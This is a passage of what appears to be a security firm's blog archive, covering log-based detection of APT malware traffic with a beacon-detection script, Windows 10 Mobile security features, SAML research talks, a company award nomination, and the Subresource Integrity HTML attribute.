In a first step, we try to clean the data set by removing noise. To achieve this, we identify known good traffic patterns and exclude them. Of course, it is not always straightforward to distinguish between normal and suspicious traffic, as some malware uses, for example, Google Docs for exfiltration. It takes some time to understand what the usual traffic in a network looks like. To clean the data set even further, we then look for connections to known malware domains.

There are plenty of publicly available lists of such domains.

If we are lucky, the attacker used infrastructure provided by known malware service providers (individuals and organizations selling services just for the purpose of hosting malware infrastructure). More sophisticated attackers, however, will most likely use their own infrastructure.

After cleaning the data sets, we look for anomalies in the logs (e.g. large numbers of requests, single requests, big DNS queries, etc.). Some malware is really noisy and, as a consequence, easy to find. Some samples connect to their C&C servers at a high frequency. Other samples request commands from their C&C servers at regular intervals (Friday 20:00, for example). Others connect just once.
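Regular check-ins of this kind can be hunted for by measuring how constant the intervals between requests are per client/domain pair. The following is a rough sketch in Python; the log line format is a made-up example and needs adapting to the proxy in use:

import statistics
from collections import defaultdict
from datetime import datetime

# Assumed line format: "2016-08-01T20:00:03 10.1.2.3 evil.example.com"
# (the log is assumed to be in chronological order)
times = defaultdict(list)
with open("proxy.log") as f:
    for line in f:
        ts, client, domain = line.split()[:3]
        times[(client, domain)].append(datetime.fromisoformat(ts).timestamp())

for (client, domain), ts in sorted(times.items()):
    if len(ts) < 10:
        continue  # too few requests to judge regularity
    deltas = [b - a for a, b in zip(ts, ts[1:])]
    if statistics.pstdev(deltas) < 1.0:  # near-constant interval: possible beacon
        print(client, domain, "every ~%.0fs, %d requests"
              % (statistics.mean(deltas), len(ts)))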

Sometimes we also detect anomalies in the network infrastructure which are caused by employees, for example heavy usage of cloud services such as Google Drive or Dropbox. Often these turn out to be so-called false positives.

To share our experiences and knowledge in this field, we created the Security Training: Network Analysis & APT.

This training will cover:

  • Configuration of evidence (What logs are needed?)
  • Static and Dynamic Log Analysis with Splunk
    • Splunk Basics and Advanced Usage
    • Detecting anomalies
    • Detecting malicious traffic
  • Attack & Detection Challenges

If you are interested please visit our “Security Trainings” section to get more information: https://www.compass-security.com/services/security-trainings/kursinhalte-network-anlysis-apt/ or get in touch if you have questions.

The next upcoming training is on 22. and 23. September 2016 in Jona, click here to register.

Sources & References:
[0] Operation Shady RAT, McAfee, http://www.mcafee.com/us/resources/white-papers/wp-operation-shady-rat.pdf
[1] The Darkhotel APT, Kaspersky Lab Research, https://securelist.com/blog/research/66779/the-darkhotel-apt/
[2] Technical Report about the Malware used in the Cyberespionage against RUAG, MELANI/GovCERT, https://www.melani.admin.ch/melani/en/home/dokumentation/reports/technical-reports/technical-report_apt_case_ruag.html
[3] “Challenges in Log-Management”, Compass Security Blog, http://blog.csnc.ch/2014/10/challenges-in-log-management/
[4] GrokBase, http://grokbase.com/
[5] Grok Debugger, https://grokdebug.herokuapp.com/
[x.0] APT Network Analysis with Splunk, Compass Security, Lukas Reschke, https://www.compass-security.com/fileadmin/Datein/Research/White_Papers/apt_network_analysis_w_splunk_whitepaper.pdf
[x.1] Whitepaper: Using Splunk To Detect DNS Tunneling, Steve Jaworski, https://www.sans.org/reading-room/whitepapers/malicious/splunk-detect-dns-tunneling-37022

Windows Phone – Security State of the Art?

Compass Security recently presented its Windows Phone and Windows 10 Mobile research at the April 2016 Security Interest Group Switzerland (SIGS) event in Zurich.

The short presentation highlights the attempts made by our Security Analysts to bypass the security controls provided by the platform and further explains why bypassing them is not a trivial undertaking.

Windows 10 Mobile, which was publicly released on March 17th 2016, has further tightened its hardware-based security defenses, introducing multiple layers of protection starting already at boot time of the platform. Minimum hardware requirements therefore include UEFI Secure Boot support and a Trusted Platform Module (TPM) conforming to the 2.0 specification. When connected to an MDM solution, the device can use the TPM for the new health attestation service to provide conditional access to the company network and its resources, and to trigger corrective measures when required.

Compared to earlier Windows Phone versions, Windows 10 Mobile finally allows end users without access to an MDM solution or ActiveSync support to enable full disk encryption based on Microsoft's BitLocker technology. Companies using an MDM solution also have fine-grained control over the encryption method and cipher strength used. Similar control can be applied to TLS cipher suites and algorithms.

Newly introduced features also include biometric authentication using Windows Hello (selected premium devices only for the moment) and Enterprise Data Protection (EDP), which helps separate personal and enterprise data and serves as a data loss prevention solution. EDP requires the Windows 10 Mobile Enterprise edition and is currently available to a restricted audience for testing purposes.

Similar to Windows 10 for workstations, the Mobile edition updates automatically. Users of the Windows 10 Mobile Enterprise edition, however, have the option to postpone the download and installation of updates.

In addition, the presentation introduces the Windows Bridges that will help developers port existing mobile applications to the new platform. While a preview version for iOS (Objective-C) has been made publicly available, Microsoft recently announced that the Windows Bridge for Android project has been cancelled. In the same week, Microsoft announced the acquisition of Xamarin, a cross-platform development solution provider, to ease the development of universal applications for the mobile platform.

The slides of the full presentation can be downloaded here.

This blog post resulted from internal research conducted by Alexandre Herzog and Cyrill Bannwart.

Compass Security nominated by Prix SVC

Compass Security proudly announces its nomination for the Prix SVC (Swiss Venture Club) award 2016. Out of 180 companies, Compass Security was selected as one of the most innovative companies in the eastern region of Switzerland. Because the award ceremony is being broadcast by TVO, we had to slip into a tuxedo and play the "license to hack" story. Please watch the teaser video on YouTube!


The award ceremony will be held on March 10th, 2016 at the Olma Hallen in St. Gallen. We don't yet know the final score, but we will keep you updated.

Thank you for the trust and confidence you have in Compass Security!!

Walter & Ivan


Presentation on SAML 2.0 Security Research

Compass Security invested quite some time last year in researching the security of single sign-on (SSO) implementations. Often, SAML (Security Assertion Markup Language) is used to implement a cross-domain SSO solution. Correct implementation and configuration are crucial for a secure authentication solution. As discussed in earlier blog articles, Compass Security identified vulnerabilities in SAML implementations with SAML Raider, a Burp extension developed by Compass Security and Emanuel Duss.

Antoine Neuenschwander and Roland Bischofberger are happy to present their research results and SAML Raider during the upcoming

Beer-Talks:
– January 14, 2016, 18:00 to 19:00, Jona
– January 21, 2016, 18:00 to 19:00, Bern

Free entrance, food and beverage. Registration required.

Get more information in our Beer-Talk page and spread the word. The Compass Crew is looking forward to meeting you.

Subresource Integrity HTML Attribute

Websites nowadays are mostly built with various resources from other origins. For example, many sites include scripts or stylesheets like jQuery or Bootstrap from a Content Delivery Network (CDN). This means that the webmasters implicitly trust the linked external sources. But what if an attacker can force the user to load content from an attacker-controlled server instead of the genuine resource (e.g. by DNS poisoning, or by replacing files on a CDN)? Until now, a security-aware webmaster had no way to protect his website against such an incident.

This is where Subresource Integrity kicks in. Subresource Integrity ensures the integrity of external resources through an additional attribute for the two HTML tags <link> and <script>. The integrity attribute contains a cryptographic hash of the external resource which should be integrated into the site. The browser then checks whether the hash of the fetched resource and the hash in the HTML attribute are identical.

Bootstrap example:

<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css" integrity="sha384-1q8mTJOASx8j1Au+a5WDVnPi2lkFfwwEAa8hDDdjZlpLegxhjVME1fgjWPGmkzs8" crossorigin="anonymous">

In the example above, the resource bootstrap.min.css is checked for integrity using its Base64-encoded SHA-384 hash. If the integrity check is positive, the browser applies the stylesheet (or executes the script in the case of a <script> tag). If the check fails, the browser must refuse to apply the stylesheet or execute the script. The user is not informed when the check has failed and a resource therefore could not be loaded; the failed request can only be seen in the developer tools of the browser used. The following image shows the error message in the Chrome developer tools.

[Figure: the browser console informs about a failed subresource integrity check]
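The integrity value itself can be computed from the resource with any SHA-384 implementation. A small sketch in Python, fetching the stylesheet from the example above:

import base64
import hashlib
import urllib.request

url = "https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css"
data = urllib.request.urlopen(url).read()

# Base64-encoded SHA-384 digest, as expected by the integrity attribute
digest = base64.b64encode(hashlib.sha384(data).digest()).decode()
print('integrity="sha384-%s"' % digest)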

The crossorigin attribute in the example configures the CORS request. The value anonymous indicates that requests for this element will not have the credentials flag set, and therefore no cookies are sent. The value use-credentials would indicate that the request will provide cookies to authenticate.

The subresource integrity attribute is currently under review before becoming a W3C standard, but it is already supported by Chrome 45 and later, Firefox 43 and later, and Opera 32 and later.

In conclusion, the subresource integrity attribute offers webmasters a better way to ensure the integrity of external resources. However, the attribute is not supported by older browsers and needs to be adjusted on every resource change. In the end, a security-aware webmaster will retain more control with less effort by keeping all resources hosted on his own servers.